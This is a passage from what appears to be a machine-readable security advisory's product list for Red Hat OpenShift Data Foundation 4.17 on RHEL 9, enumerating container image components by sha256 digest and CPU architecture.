"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", }, product_reference: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", }, product_reference: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", }, product_reference: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", }, product_reference: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", }, product_reference: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", }, product_reference: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", }, product_reference: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", }, product_reference: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", }, product_reference: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", }, product_reference: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", }, product_reference: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", }, product_reference: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", }, product_reference: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", }, product_reference: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: 